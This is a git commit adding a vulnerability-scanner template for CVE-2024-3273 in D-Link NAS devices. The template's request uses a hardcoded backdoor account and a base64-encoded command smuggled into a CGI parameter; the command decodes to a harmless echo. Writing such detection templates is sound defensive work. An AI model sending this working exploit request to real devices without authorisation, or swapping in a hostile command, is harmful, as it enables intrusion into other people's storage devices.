Create CVE-2024-3273.yaml

2024-04-09 22:45:08 +05:30 · 2024-04-09 22:45:08 +05:30 · 224c2f1cf5
parent eb336e8503
commit 224c2f1cf5
1 changed files with 29 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-3273.yaml
+++ b/http/cves/2024/CVE-2024-3273.yaml
@ -0,0 +1,29 @@
+id: CVE-2024-3273
+info:
+  name: D-Link Network Attached Storage - Command Injection and Backdoor Account
+  author: pussycat0x
+  severity: high
+  reference:
+    - https://github.com/netsecfish/dlink
+    - https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/#google_vignette
+  metadata:
+    verified: true
+    fofa-query: app="D_Link-DNS-ShareCenter"
+  tags: cve,cve2024,dlink,nas  
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobyB0ZXN0"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<auth_state>1</auth_state>"
+          - "test"
+        condition: and
+
+      - type: status
+        status:
+          - 200